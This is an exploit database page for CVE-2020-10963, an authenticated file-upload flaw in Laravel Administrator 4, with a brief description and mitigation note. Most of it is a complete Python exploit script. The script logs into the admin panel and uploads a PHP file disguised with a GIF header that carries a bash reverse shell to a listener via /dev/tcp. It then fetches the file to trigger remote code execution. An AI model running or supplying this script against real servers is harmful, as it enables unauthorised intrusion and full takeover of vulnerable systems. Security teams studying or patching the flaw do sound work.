header-logo
Suggest Exploit
vendor:
Laravel Administrator
by:
Victor Campos and Xavi Beltran
7.2
CVSS
HIGH
Unrestricted File Upload
434
CWE
Product Name: Laravel Administrator
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: CVE-2020-10963
CPE: a:frozennode:laravel_administrator
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Laravel-Administrator 4
2020

Laravel Administrator 4 – Unrestricted File Upload (Authenticated)

An authenticated user can upload a malicious file to the server, allowing for remote code execution. This exploit was discovered by Victor Campos and Xavi Beltran and affects Laravel-Administrator version 4.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the expected file types and extensions. Additionally, ensure that the application is configured to only allow the upload of files to the expected directory.
Source

Exploit-DB raw data:

# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
# Author: Victor Campos and Xavi Beltran
# Contact: vcmartin@protonmail.com
# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
# Date: 25/3/2020
# Software link: https://github.com/FrozenNode/Laravel-Administrator/
# Version : 4
# Tested on: Laravel-Administrator 4
# CVE : CVE-2020-10963

#!/usr/bin/env python

import requests,json,traceback
from requests.auth import HTTPBasicAuth


#Parameters to be set up (ENTER YOUR VALUES)
#===========================================
# Listener IP and port
ip = ""
port = ""
#Admin credentials
user = ""
password = ""
#URLs of the web application
domain = "" # For example "https://www.example.com"
login_url = "" # For example "/user/login"
fileupload_url = "" # For example "/admin/categories/image/file_upload"
uploaded_files_url = "" # For example "/categories/images"



#Reverse shell payload (DO NOT MODIFY THIS SECTION)
#==================================================
#GIF file header
shell = "GIF89a\r\n"
#php reverse shell
shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"


with requests.Session() as s:
    try:
        print("\n[+] Logging into the panel")
        s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
        print("[+] Uploading the malicious file")
        r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
        print("[+] Response text:")
        #print(r.text)
        shell_file = (json.loads(r.text))["filename"]
        print("[+] Name of uploaded file: " + shell_file)
        print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
        r = s.get(domain + uploaded_files_url + '/' + shell_file)
    except Exception as e:
        print(str(traceback.format_exc()))

Navigation

Suggest Exploit

Services By CQR